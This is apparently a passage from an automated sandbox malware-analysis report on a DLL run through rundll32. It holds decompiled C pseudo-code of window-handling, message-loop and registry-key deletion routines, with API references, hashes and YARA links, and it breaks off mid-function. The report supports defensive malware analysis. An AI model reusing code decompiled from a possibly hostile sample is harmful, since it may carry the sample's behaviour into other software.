                                                                                                        • API String ID: 1124862357-0
                                                                                                        • Opcode ID: 4ffc5c9f413903c69e2b5861111302b01c4a1b9baaf941747837db025beb87d7
                                                                                                        • Instruction ID: 060545af6b8980f94d003f59aa46a702479098f047a03de319b7069e0510e281
                                                                                                        • Opcode Fuzzy Hash: 4ffc5c9f413903c69e2b5861111302b01c4a1b9baaf941747837db025beb87d7
                                                                                                        • Instruction Fuzzy Hash: 285173B2A00209DFCB45DFA8C5C5A9E7BF5FF08314F144196E905EB20AE634EA40CB94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10025045, Relevance: 9.1, APIs: 6, Instructions: 115threadwindowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 81%
                                                                                                        			E10025045(void* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t37;
				signed int _t54;
				intOrPtr _t57;
				long _t60;
				struct HWND__* _t63;
				CHAR* _t64;
				void* _t65;
				void* _t67;
				void* _t71;
				void* _t72;
				long _t73;
				void* _t74;
				void* _t75;
				signed int _t77;
				void* _t78;
				signed int _t79;
				void* _t81;

				_t71 = __edx;
				_t79 = _t81 - 0x9c;
				_t37 =  *0x10072650; // 0xb5e27fef
				 *(_t79 + 0x98) = _t37 ^ _t79;
				_t73 =  *(_t79 + 0xa4);
				_t77 = 0;
				 *((intOrPtr*)(_t79 - 0x80)) =  *((intOrPtr*)(_t79 + 0xa8));
				E10024F66(0);
				_t67 = _t72;
				_t63 = E10024F9A(0, _t79 - 0x70);
				 *(_t79 - 0x7c) = _t63;
				if(_t63 !=  *(_t79 - 0x70)) {
					EnableWindow(_t63, 1);
				}
				 *(_t79 - 0x78) =  *(_t79 - 0x78) & _t77;
				GetWindowThreadProcessId(_t63, _t79 - 0x78);
				if(_t63 == 0 ||  *(_t79 - 0x78) != GetCurrentProcessId()) {
					L6:
					__eflags = _t73;
					if(__eflags != 0) {
						_t77 = _t73 + 0x78;
					}
					goto L8;
				} else {
					_t60 = SendMessageA(_t63, 0x376, 0, 0);
					if(_t60 == 0) {
						goto L6;
					} else {
						_t77 = _t60;
						L8:
						 *(_t79 - 0x74) =  *(_t79 - 0x74) & 0x00000000;
						if(_t77 != 0) {
							 *(_t79 - 0x74) =  *_t77;
							_t57 =  *((intOrPtr*)(_t79 + 0xb0));
							if(_t57 != 0) {
								 *_t77 = _t57 + 0x30000;
							}
						}
						if(( *(_t79 + 0xac) & 0x000000f0) == 0) {
							_t54 =  *(_t79 + 0xac) & 0x0000000f;
							if(_t54 <= 1) {
								_t24 = _t79 + 0xac;
								 *_t24 =  *(_t79 + 0xac) | 0x00000030;
								__eflags =  *_t24;
							} else {
								if(_t54 + 0xfffffffd <= 1) {
									 *(_t79 + 0xac) =  *(_t79 + 0xac) | 0x00000020;
								}
							}
						}
						_t96 = _t73;
						 *(_t79 - 0x6c) = 0;
						if(_t73 == 0) {
							_t64 = _t79 - 0x6c;
							_t73 = 0x104;
							__eflags = GetModuleFileNameA(0, _t64, 0x104) - 0x104;
							if(__eflags == 0) {
								 *((char*)(_t79 + 0x97)) = 0;
							}
						} else {
							_t64 =  *(_t73 + 0x50);
						}
						_push( *(_t79 + 0xac));
						_push(_t64);
						_push( *((intOrPtr*)(_t79 - 0x80)));
						_push( *(_t79 - 0x7c));
						_t74 = E1000CED0(_t64, _t67, _t73, _t77, _t96);
						if(_t77 != 0) {
							 *_t77 =  *(_t79 - 0x74);
						}
						if( *(_t79 - 0x70) != 0) {
							EnableWindow( *(_t79 - 0x70), 1);
						}
						E10024F66(1);
						_pop(_t75);
						_pop(_t78);
						_pop(_t65);
						return E10039F21(_t74, _t65,  *(_t79 + 0x98) ^ _t79, _t71, _t75, _t78);
					}
				}
			}
























                                                                                                        0x10025045
                                                                                                        0x10025046
                                                                                                        0x10025053
                                                                                                        0x1002505a
                                                                                                        0x10025069
                                                                                                        0x1002506f
                                                                                                        0x10025072
                                                                                                        0x10025075
                                                                                                        0x1002507a
                                                                                                        0x10025085
                                                                                                        0x1002508a
                                                                                                        0x1002508d
                                                                                                        0x10025092
                                                                                                        0x10025092
                                                                                                        0x10025098
                                                                                                        0x100250a0
                                                                                                        0x100250a8
                                                                                                        0x100250cd
                                                                                                        0x100250cd
                                                                                                        0x100250cf
                                                                                                        0x100250d1
                                                                                                        0x100250d1
                                                                                                        0x00000000
                                                                                                        0x100250b5
                                                                                                        0x100250bf
                                                                                                        0x100250c7
                                                                                                        0x00000000
                                                                                                        0x100250c9
                                                                                                        0x100250c9
                                                                                                        0x100250d4
                                                                                                        0x100250d4
                                                                                                        0x100250da
                                                                                                        0x100250de
                                                                                                        0x100250e1
                                                                                                        0x100250e9
                                                                                                        0x100250f0
                                                                                                        0x100250f0
                                                                                                        0x100250e9
                                                                                                        0x100250f9
                                                                                                        0x10025101
                                                                                                        0x10025107
                                                                                                        0x1002511a
                                                                                                        0x1002511a
                                                                                                        0x1002511a
                                                                                                        0x10025109
                                                                                                        0x1002510f
                                                                                                        0x10025111
                                                                                                        0x10025111
                                                                                                        0x1002510f
                                                                                                        0x10025107
                                                                                                        0x10025121
                                                                                                        0x10025123
                                                                                                        0x10025127
                                                                                                        0x1002512e
                                                                                                        0x10025131
                                                                                                        0x10025142
                                                                                                        0x10025144
                                                                                                        0x10025146
                                                                                                        0x10025146
                                                                                                        0x10025129
                                                                                                        0x10025129
                                                                                                        0x10025129
                                                                                                        0x1002514d
                                                                                                        0x10025153
                                                                                                        0x10025154
                                                                                                        0x10025157
                                                                                                        0x10025164
                                                                                                        0x10025166
                                                                                                        0x1002516b
                                                                                                        0x1002516b
                                                                                                        0x10025171
                                                                                                        0x10025178
                                                                                                        0x10025178
                                                                                                        0x10025180
                                                                                                        0x1002518e
                                                                                                        0x1002518f
                                                                                                        0x10025192
                                                                                                        0x1002519f
                                                                                                        0x1002519f
                                                                                                        0x100250c7

                                                                                                        APIs
                                                                                                          • Part of subcall function 10024F9A: GetParent.USER32(?), ref: 10024FED
                                                                                                          • Part of subcall function 10024F9A: GetLastActivePopup.USER32(?), ref: 10024FFC
                                                                                                          • Part of subcall function 10024F9A: IsWindowEnabled.USER32(?), ref: 10025011
                                                                                                          • Part of subcall function 10024F9A: EnableWindow.USER32(?,00000000), ref: 10025024
                                                                                                        • EnableWindow.USER32(?,00000001), ref: 10025092
                                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 100250A0
                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 100250AA
                                                                                                        • SendMessageA.USER32 ref: 100250BF
                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1002513C
                                                                                                        • EnableWindow.USER32(?,00000001), ref: 10025178
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 1877664794-0
                                                                                                        • Opcode ID: edc0b81291e7e2a2d36287fec3483512f230cc3b3d1996ba9c1104766374c41e
                                                                                                        • Instruction ID: 4c829c5644aa77a9a1823c96e9ef9ea07201a3d85bc19dbd2844f63f03839321
                                                                                                        • Opcode Fuzzy Hash: edc0b81291e7e2a2d36287fec3483512f230cc3b3d1996ba9c1104766374c41e
                                                                                                        • Instruction Fuzzy Hash: 1B418D32A003589FEB30CFB4DC85B9D77B8EF05752F610119E95AEB282E77299448B54
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 100387B4, Relevance: 9.1, APIs: 6, Instructions: 101windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 81%
                                                                                                        			E100387B4(void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				struct tagMSG _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t30;
				void* _t32;
				void* _t34;
				void* _t36;
				intOrPtr* _t37;
				void* _t41;
				intOrPtr _t53;
				void* _t54;
				void* _t56;
				void* _t57;
				void* _t58;
				intOrPtr* _t59;

				_t55 = __edx;
				_t51 = __ecx;
				_t56 = GetCapture;
				_t57 = __ecx;
				if(GetCapture() != 0) {
					L20:
					return 0;
				}
				E1000E5E5(0, _t51, _t58, SetCapture( *( *((intOrPtr*)(_t57 + 0x68)) + 0x20)));
				if(E1000E5E5(0, _t51, _t58, GetCapture()) !=  *((intOrPtr*)(_t57 + 0x68))) {
					L19:
					E10038627(0, _t57, _t69);
					goto L20;
				} else {
					while(GetMessageA( &_v32, 0, 0, 0) != 0) {
						_t30 = _v32.message - 0x100;
						if(_t30 == 0) {
							__eflags =  *((intOrPtr*)(_t57 + 0x88));
							if( *((intOrPtr*)(_t57 + 0x88)) != 0) {
								_t51 = _t57;
								E1003847F(_t57, _v32.wParam, 1);
							}
							__eflags = _v32.wParam - 0x1b;
							if(__eflags != 0) {
								L18:
								_t32 = E1000E5E5(0, _t51, _t58, GetCapture());
								_t69 = _t32 -  *((intOrPtr*)(_t57 + 0x68));
								if(_t32 ==  *((intOrPtr*)(_t57 + 0x68))) {
									continue;
								}
							}
							goto L19;
						}
						_t34 = _t30 - 1;
						if(_t34 == 0) {
							__eflags =  *((intOrPtr*)(_t57 + 0x88));
							if(__eflags != 0) {
								_t51 = _t57;
								E1003847F(_t57, _v32.wParam, 0);
							}
							goto L18;
						}
						_t36 = _t34 - 0xff;
						if(_t36 == 0) {
							_t53 = _v32.pt;
							_t55 = _v8;
							__eflags =  *((intOrPtr*)(_t57 + 0x88));
							_push(_t53);
							_push(_t53);
							_t37 = _t59;
							 *_t37 = _t53;
							 *((intOrPtr*)(_t37 + 4)) = _v8;
							_t51 = _t57;
							if( *((intOrPtr*)(_t57 + 0x88)) == 0) {
								E100384B3(_t51, _t56);
							} else {
								E10038403(_t51);
							}
							goto L18;
						}
						_t41 = _t36;
						if(_t41 == 0) {
							__eflags =  *((intOrPtr*)(_t57 + 0x88));
							_t54 = _t57;
							if(__eflags == 0) {
								E10038770(0, _t58, __eflags);
							} else {
								E1003866C(_t54, _t55, _t56, _t57, __eflags);
							}
							return 1;
						}
						if(_t41 == 0) {
							goto L19;
						}
						DispatchMessageA( &_v32);
						goto L18;
					}
					_push(_v32.wParam);
					E10026933();
					goto L19;
				}
			}





















                                                                                                        0x100387b4
                                                                                                        0x100387b4
                                                                                                        0x100387bd
                                                                                                        0x100387c3
                                                                                                        0x100387c9
                                                                                                        0x100388a3
                                                                                                        0x00000000
                                                                                                        0x100388a3
                                                                                                        0x100387dc
                                                                                                        0x100387ec
                                                                                                        0x1003889c
                                                                                                        0x1003889e
                                                                                                        0x00000000
                                                                                                        0x100387f2
                                                                                                        0x100387f4
                                                                                                        0x1003880c
                                                                                                        0x10038811
                                                                                                        0x10038871
                                                                                                        0x10038877
                                                                                                        0x1003887e
                                                                                                        0x10038880
                                                                                                        0x10038880
                                                                                                        0x10038885
                                                                                                        0x10038889
                                                                                                        0x1003888b
                                                                                                        0x1003888e
                                                                                                        0x10038893
                                                                                                        0x10038896
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10038896
                                                                                                        0x00000000
                                                                                                        0x10038889
                                                                                                        0x10038813
                                                                                                        0x10038814
                                                                                                        0x1003885c
                                                                                                        0x10038862
                                                                                                        0x10038868
                                                                                                        0x1003886a
                                                                                                        0x1003886a
                                                                                                        0x00000000
                                                                                                        0x10038862
                                                                                                        0x10038816
                                                                                                        0x1003881b
                                                                                                        0x10038835
                                                                                                        0x10038838
                                                                                                        0x1003883b
                                                                                                        0x10038841
                                                                                                        0x10038842
                                                                                                        0x10038843
                                                                                                        0x10038845
                                                                                                        0x10038847
                                                                                                        0x1003884a
                                                                                                        0x1003884c
                                                                                                        0x10038855
                                                                                                        0x1003884e
                                                                                                        0x1003884e
                                                                                                        0x1003884e
                                                                                                        0x00000000
                                                                                                        0x1003884c
                                                                                                        0x1003881e
                                                                                                        0x1003881f
                                                                                                        0x100388b4
                                                                                                        0x100388ba
                                                                                                        0x100388bc
                                                                                                        0x100388c5
                                                                                                        0x100388be
                                                                                                        0x100388be
                                                                                                        0x100388be
                                                                                                        0x00000000
                                                                                                        0x100388cc
                                                                                                        0x10038827
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1003882d
                                                                                                        0x00000000
                                                                                                        0x1003882d
                                                                                                        0x100388aa
                                                                                                        0x100388ad
                                                                                                        0x00000000
                                                                                                        0x100388ad

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Capture$Message$Dispatch
                                                                                                        • String ID:
                                                                                                        • API String ID: 3654672037-0
                                                                                                        • Opcode ID: 2d2c053ebe6b21ddf56576f2fd9228eb340c24e045ae9b92debe497d1aea0dc8
                                                                                                        • Instruction ID: 58140d2015faf17e2d99ab4fe7c885034bb6094fb7cc9d520a4d421e703158fb
                                                                                                        • Opcode Fuzzy Hash: 2d2c053ebe6b21ddf56576f2fd9228eb340c24e045ae9b92debe497d1aea0dc8
                                                                                                        • Instruction Fuzzy Hash: AB310374900745DFDB67EBA48C8596E77E9EB80383F9008AAF551EA110DE30AF40C761
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10035A58, Relevance: 9.1, APIs: 6, Instructions: 71registrystringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 74%
                                                                                                        			E10035A58(void* __edx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				char _v272;
				void* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t8;
				char* _t14;
				void* _t24;
				int _t25;
				void* _t34;
				char* _t35;
				void* _t36;
				signed int _t38;

				_t34 = __edx;
				_t8 =  *0x10072650; // 0xb5e27fef
				_v8 = _t8 ^ _t38;
				_t35 = E1003F40E(_a4);
				if(_t35 != 0) {
					_t14 =  &(_t35[lstrlenA(_t35)]);
					if(_t14 != 0) {
						_push(_t36);
						_push(_t24);
						while(1) {
							 *_t14 = 0;
							E1003F60C(_t35, _t14);
							if(RegOpenKeyA(0x80000000, _t35,  &_v276) != 0) {
								break;
							}
							_t25 = 0;
							if(RegEnumKeyA(_v276, 0,  &_v272, 0x105) == 0) {
								_t25 = 1;
							}
							RegCloseKey(_v276);
							if(_t25 == 0) {
								RegDeleteKeyA(0x80000000, _t35);
								_t14 = E10040566(_t35, 0x5c);
								_t46 = _t14;
								if(_t14 != 0) {
									continue;
								}
							}
							break;
						}
						_pop(_t24);
						_pop(_t36);
					}
					_push(_t35);
					E10039F30(_t24, _t35, _t36, _t46);
				}
				return E10039F21(1, _t24, _v8 ^ _t38, _t34, _t35, _t36);
			}


















                                                                                                        0x10035a58
                                                                                                        0x10035a61
                                                                                                        0x10035a68
                                                                                                        0x10035a75
                                                                                                        0x10035a7a
                                                                                                        0x10035a87
                                                                                                        0x10035a89
                                                                                                        0x10035a8b
                                                                                                        0x10035a91
                                                                                                        0x10035a92
                                                                                                        0x10035a94
                                                                                                        0x10035a97
                                                                                                        0x10035aaf
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10035abd
                                                                                                        0x10035ace
                                                                                                        0x10035ad0
                                                                                                        0x10035ad0
                                                                                                        0x10035ad7
                                                                                                        0x10035adf
                                                                                                        0x10035ae3
                                                                                                        0x10035aec
                                                                                                        0x10035af1
                                                                                                        0x10035af5
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10035af5
                                                                                                        0x00000000
                                                                                                        0x10035adf
                                                                                                        0x10035af7
                                                                                                        0x10035af8
                                                                                                        0x10035af8
                                                                                                        0x10035af9
                                                                                                        0x10035afa
                                                                                                        0x10035b02
                                                                                                        0x10035b0f

                                                                                                        APIs
                                                                                                        • __strdup.LIBCMT ref: 10035A70
                                                                                                        • lstrlenA.KERNEL32(00000000,?), ref: 10035A81
                                                                                                          • Part of subcall function 1003F60C: __mbsdec_l.LIBCMT ref: 1003F616
                                                                                                        • RegOpenKeyA.ADVAPI32(80000000,00000000,?), ref: 10035AA7
                                                                                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 10035AC6
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 10035AD7
                                                                                                        • RegDeleteKeyA.ADVAPI32(80000000,00000000), ref: 10035AE3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseDeleteEnumOpen__mbsdec_l__strduplstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 2107731021-0
                                                                                                        • Opcode ID: e12782b9b6b63dfd8a0d378f8f49bbab1ed3f408523f174e8c8d282b728816ba
                                                                                                        • Instruction ID: ea86eb6e90e6ecaea6e6e0f7a28099a3bf6e988834cb775aab1312c91ea76524
                                                                                                        • Opcode Fuzzy Hash: e12782b9b6b63dfd8a0d378f8f49bbab1ed3f408523f174e8c8d282b728816ba
                                                                                                        • Instruction Fuzzy Hash: CA11C4356001196EE712DB648CCAFAB77BCEF45657F10006AF540E6090DE759E449A25
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10024F9A, Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E10024F9A(struct HWND__* _a4, struct HWND__** _a8) {
				struct HWND__* _t7;
				void* _t13;
				struct HWND__** _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;
				struct HWND__* _t18;

				_t18 = _a4;
				_t17 = _t18;
				if(_t18 != 0) {
					L5:
					if((GetWindowLongA(_t17, 0xfffffff0) & 0x40000000) == 0) {
						L8:
						_t16 = _t17;
						_t7 = _t17;
						if(_t17 == 0) {
							L10:
							if(_t18 == 0 && _t17 != 0) {
								_t17 = GetLastActivePopup(_t17);
							}
							_t15 = _a8;
							if(_t15 != 0) {
								if(_t16 == 0 || IsWindowEnabled(_t16) == 0 || _t16 == _t17) {
									 *_t15 =  *_t15 & 0x00000000;
								} else {
									 *_t15 = _t16;
									EnableWindow(_t16, 0);
								}
							}
							return _t17;
						} else {
							goto L9;
						}
						do {
							L9:
							_t16 = _t7;
							_t7 = GetParent(_t7);
						} while (_t7 != 0);
						goto L10;
					}
					_t17 = GetParent(_t17);
					L7:
					if(_t17 != 0) {
						goto L5;
					}
					goto L8;
				}
				_t13 = E10024F5A();
				if(_t13 != 0) {
					L4:
					_t17 =  *(_t13 + 0x20);
					goto L7;
				}
				_t13 = E10009B1B();
				if(_t13 != 0) {
					goto L4;
				}
				_t17 = 0;
				goto L8;
			}









                                                                                                        0x10024fa2
                                                                                                        0x10024faa
                                                                                                        0x10024fac
                                                                                                        0x10024fc9
                                                                                                        0x10024fd7
                                                                                                        0x10024fe2
                                                                                                        0x10024fe4
                                                                                                        0x10024fe6
                                                                                                        0x10024fe8
                                                                                                        0x10024ff3
                                                                                                        0x10024ff5
                                                                                                        0x10025002
                                                                                                        0x10025002
                                                                                                        0x10025004
                                                                                                        0x1002500a
                                                                                                        0x1002500e
                                                                                                        0x1002502c
                                                                                                        0x1002501f
                                                                                                        0x10025022
                                                                                                        0x10025024
                                                                                                        0x10025024
                                                                                                        0x1002500e
                                                                                                        0x10025035
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10024fea
                                                                                                        0x10024fea
                                                                                                        0x10024feb
                                                                                                        0x10024fed
                                                                                                        0x10024fef
                                                                                                        0x00000000
                                                                                                        0x10024fea
                                                                                                        0x10024fdc
                                                                                                        0x10024fde
                                                                                                        0x10024fe0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10024fe0
                                                                                                        0x10024fae
                                                                                                        0x10024fb5
                                                                                                        0x10024fc4
                                                                                                        0x10024fc4
                                                                                                        0x00000000
                                                                                                        0x10024fc4
                                                                                                        0x10024fb7
                                                                                                        0x10024fbe
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10024fc0
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                        • String ID:
                                                                                                        • API String ID: 670545878-0
                                                                                                        • Opcode ID: 3909bdc39e99cdb824bdca6faa6a2406ae751b2bc3e8fab5d9ff2795ac8102c9
                                                                                                        • Instruction ID: db2e113731f48228abdd6c22f24f40818a75178a4d4874d17b56634b24980131
                                                                                                        • Opcode Fuzzy Hash: 3909bdc39e99cdb824bdca6faa6a2406ae751b2bc3e8fab5d9ff2795ac8102c9
                                                                                                        • Instruction Fuzzy Hash: BF11A33260163697D3A1EA69AEC4B1F72E8EF94BD2F930125EC01E7255DF71CC0042D9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10013303, Relevance: 9.1, APIs: 6, Instructions: 65COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 95%
                                                                                                        			E10013303(intOrPtr _a4) {
				intOrPtr _v4;
				void* __ecx;
				void* __edi;
				void* __esi;
				struct HWND__* _t17;
				struct HWND__* _t19;
				signed int _t23;
				intOrPtr _t31;
				void* _t32;
				struct HWND__* _t34;

				_v4 = _t31;
				_t17 = GetWindow(GetDesktopWindow(), 5);
				_t34 = _t17;
				_t36 = _t34;
				if(_t34 == 0) {
					return _t17;
				} else {
					_push(_t32);
					while(1) {
						_t32 = E1000E60C(_t31, _t32, _t34, _t36, _t34);
						if(_t32 != 0) {
							_t21 =  *((intOrPtr*)(_v4 + 0x20));
							if( *((intOrPtr*)(_v4 + 0x20)) != _t34 && E10013272(_t21, _t34) != 0) {
								_t23 = GetWindowLongA(_t34, 0xfffffff0);
								if(_a4 != 0) {
									__eflags = _t23 & 0x18000000;
									if(__eflags == 0) {
										__eflags =  *(_t32 + 0x3c) & 0x00000002;
										if(__eflags != 0) {
											__eflags =  *(_v4 + 0xb4);
											if(__eflags == 0) {
												ShowWindow(_t34, 4);
												_t14 = _t32 + 0x3c;
												 *_t14 =  *(_t32 + 0x3c) & 0xfffffffd;
												__eflags =  *_t14;
											}
										}
									}
								} else {
									if((_t23 & 0x18000000) == 0x10000000) {
										ShowWindow(_t34, 0);
										 *(_t32 + 0x3c) =  *(_t32 + 0x3c) | 0x00000002;
									}
								}
							}
						}
						_t19 = GetWindow(_t34, 2);
						_t34 = _t19;
						if(_t34 == 0) {
							return _t19;
						}
					}
				}
			}













                                                                                                        0x10013308
                                                                                                        0x10013319
                                                                                                        0x1001331b
                                                                                                        0x1001331d
                                                                                                        0x1001331f
                                                                                                        0x100133a9
                                                                                                        0x10013325
                                                                                                        0x1001332c
                                                                                                        0x1001332d
                                                                                                        0x10013333
                                                                                                        0x10013337
                                                                                                        0x1001333d
                                                                                                        0x10013342
                                                                                                        0x10013352
                                                                                                        0x1001335d
                                                                                                        0x10013376
                                                                                                        0x1001337b
                                                                                                        0x1001337d
                                                                                                        0x10013381
                                                                                                        0x10013387
                                                                                                        0x1001338e
                                                                                                        0x10013393
                                                                                                        0x10013395
                                                                                                        0x10013395
                                                                                                        0x10013395
                                                                                                        0x10013395
                                                                                                        0x1001338e
                                                                                                        0x10013381
                                                                                                        0x1001335f
                                                                                                        0x10013369
                                                                                                        0x1001336e
                                                                                                        0x10013370
                                                                                                        0x10013370
                                                                                                        0x10013369
                                                                                                        0x1001335d
                                                                                                        0x10013342
                                                                                                        0x1001339c
                                                                                                        0x1001339e
                                                                                                        0x100133a2
                                                                                                        0x00000000
                                                                                                        0x100133a5
                                                                                                        0x100133a2
                                                                                                        0x1001332d

                                                                                                        APIs
                                                                                                        • GetDesktopWindow.USER32 ref: 1001330C
                                                                                                        • GetWindow.USER32(00000000), ref: 10013319
                                                                                                        • GetWindowLongA.USER32 ref: 10013352
                                                                                                        • ShowWindow.USER32(00000000,00000000,?,00000000,?,?,10018F59,00000000), ref: 1001336E
                                                                                                        • ShowWindow.USER32(00000000,00000004), ref: 10013393
                                                                                                        • GetWindow.USER32(00000000,00000002), ref: 1001339C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Show$DesktopLong
                                                                                                        • String ID:
                                                                                                        • API String ID: 3178490500-0
                                                                                                        • Opcode ID: 89b6a5fb984f68ab2f38c35047cb3a10e3b0aaac9b8ca157d8d87cce50ab9a07
                                                                                                        • Instruction ID: ce047d198d82d06fc6b0aff4bf3a6906737877de3fcc2137ee2c92f63e817dc5
                                                                                                        • Opcode Fuzzy Hash: 89b6a5fb984f68ab2f38c35047cb3a10e3b0aaac9b8ca157d8d87cce50ab9a07
                                                                                                        • Instruction Fuzzy Hash: 3D11BFB1505767AAD321C6258C89B4B77D8EF413A4F528114F960DA180CF74DE808BA9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1001BE89, Relevance: 9.1, APIs: 6, Instructions: 57registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E1001BE89(intOrPtr __ecx, CHAR* _a4, char* _a8, char* _a12) {
				long _t21;
				void* _t28;

				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
					return WritePrivateProfileStringA(_a4, _a8, _a12,  *(__ecx + 0x68));
				}
				if(_a8 != 0) {
					_t28 = E1001BD53(__ecx, _a4);
					if(_a12 != 0) {
						if(_t28 == 0) {
							L3:
							return 0;
						}
						_t21 = RegSetValueExA(_t28, _a8, 0, 1, _a12, lstrlenA(_a12) + 1);
						L10:
						RegCloseKey(_t28);
